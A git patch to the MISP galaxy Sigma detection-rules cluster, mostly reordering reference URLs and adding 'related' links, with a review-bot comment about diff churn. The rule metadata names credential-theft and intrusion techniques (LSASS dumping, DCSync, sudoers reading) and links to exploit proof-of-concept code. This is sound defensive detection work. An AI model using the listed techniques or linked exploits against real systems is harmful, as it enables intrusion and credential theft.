"d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", "value": "File Deletion" }, 
@@ -65264,8 +83924,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://research.splunk.com/endpoint/linux_doas_tool_execution/", "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://research.splunk.com/endpoint/linux_doas_tool_execution/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" ], "tags": [ @@ -65273,6 +83933,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "067d8238-7127-451c-a9ec-fa78045b618b", "value": "Linux Doas Tool Execution" }, @@ -65298,6 +83967,15 @@ "attack.t1565.001" ] }, + "related": [ + { + "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f", "value": "History File Deletion" }, @@ -65322,6 +84000,15 @@ "attack.t1592.004" ] }, + "related": [ + { + "dest-uuid": "774ad5bb-2366-4c13-a8a9-65e50b292e7c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", "value": "Cat Sudoers" }, @@ -65346,6 +84033,15 @@ "attack.t1593.003" ] }, + "related": [ + { + "dest-uuid": "70910fbd-58dc-4c1c-8c48-814d11fcd022", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", "value": "Suspicious Git Clone - Linux" }, 
@@ -65362,14 +84058,24 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", "https://attack.mitre.org/techniques/T1548/001/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" ], "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1548.001" ] }, + "related": [ + { + "dest-uuid": "6831414d-bb70-42b7-8030-d4e06b2660c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", "value": "Setuid and Setgid" }, @@ -65386,9 +84092,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", - "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", "https://github.com/apache/spark/pull/36315/files", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" ], "tags": [ @@ -65397,6 +84103,15 @@ "cve.2022.33891" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", "value": "Apache Spark Shell Command Injection - ProcessCreation" }, 
@@ -65421,6 +84136,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "676381a6-15ca-4d73-a9c8-6a22e970b90d", "value": "Local Groups Discovery - Linux" }, @@ -65437,8 +84161,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/", + "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml" ], "tags": [ From fd226d47a27f09523f1301c33690c17af06f4271 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Thu, 12 Jan 2023 14:10:22 +0100 Subject: [PATCH 10/13] chg: [sigma] new version of the cluster --- clusters/sigma-rules.json | 2150 ++++++++++++++++++------------------- 1 file changed, 1075 insertions(+), 1075 deletions(-) diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json index 9954344..504a13a 100644 --- a/clusters/sigma-rules.json +++ b/clusters/sigma-rules.json @@ -174,9 +174,9 @@ "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml" ], "tags": "No established tags" 
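Review bot: Every hunk of this commit, starting with `@@ -174,9 +174,9 @@`, only permutes the entries of a `refs` array, which suggests the cluster generator emits a rule's `references` in a non-deterministic (set-like) order before appending the trailing SigmaHQ link, which alone keeps its position. A regeneration therefore produces a 1075/1075-line churn diff in which a genuine content change — a new reference, a changed tag, a changed `related` entry — cannot be picked out by a reviewer. Having the generator preserve the order of the rule's `references` list (or sort it) would make regenerations diff-minimal and reviewable. The same observation applies to all following hunks of this file section, so it is raised only once here.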
@@ -232,9 +232,9 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", - "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://core.telegram.org/bots/faq", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" ], @@ -310,8 +310,8 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" ], "tags": [ @@ -417,8 +417,8 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", "https://zeltser.com/c2-dns-tunneling/", + "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" ], "tags": [ 
@@ -460,8 +460,8 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", "https://twitter.com/stvemillertime/status/1024707932447854592", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" ], "tags": [ @@ -1329,10 +1329,10 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", "https://threatpost.com/microsoft-petitpotam-poc/168163/", - "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", + "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", + "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" ], "tags": [ @@ -1700,9 +1700,9 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/Maka8ka/NGLite", "https://github.com/nknorg/nkn-sdk-go", - "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" ], "tags": [ 
@@ -1751,8 +1751,8 @@ "logsource.product": "zeek", "refs": [ "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://twitter.com/_dirkjan/status/1309214379003588608", "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://twitter.com/_dirkjan/status/1309214379003588608", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" ], "tags": [ @@ -1843,11 +1843,11 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", - "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", + "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", "https://github.com/corelight/CVE-2021-1675", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" ], 
@@ -2148,10 +2148,10 @@ "logsource.category": "application", "logsource.product": "ruby_on_rails", "refs": [ - "http://guides.rubyonrails.org/action_controller_overview.html", - "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", "http://edgeguides.rubyonrails.org/security.html", "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", + "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", + "http://guides.rubyonrails.org/action_controller_overview.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" ], "tags": [ @@ -2184,10 +2184,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", - "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" ], "tags": [ 
@@ -2211,10 +2211,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" ], "tags": [ @@ -2237,8 +2237,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" 
@@ -2263,9 +2263,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" ], @@ -2299,8 +2299,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" @@ -2337,9 +2337,9 @@ "logsource.product": "rpc_firewall", "refs": [ "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/zeronetworks/rpcfirewall", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", - "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" ], "tags": [ 
@@ -2387,8 +2387,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" @@ -2424,8 +2424,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" ], @@ -2467,8 +2467,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" 
@@ -2504,12 +2504,12 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://github.com/zeronetworks/rpcfirewall", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", - "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" ], "tags": [ @@ -2532,9 +2532,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" ], 
@@ -2558,9 +2558,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" ], @@ -2584,8 +2584,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" 
@@ -2610,10 +2610,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" ], "tags": [ @@ -2637,9 +2637,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" ], 
@@ -2663,9 +2663,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" ], @@ -2722,11 +2722,11 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" ], "tags": [ 
@@ -2760,8 +2760,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" ], "tags": [ @@ -2941,9 +2941,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://twitter.com/mrd0x/status/1460597833917251595", "https://twitter.com/_xpn_/status/1491557187168178176", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" ], "tags": [ 
@@ -3188,10 +3188,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", - "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" ], "tags": [ @@ -3225,10 +3225,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" ], "tags": [ 
@@ -3263,11 +3263,11 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" ], "tags": [ 
@@ -3301,11 +3301,11 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", 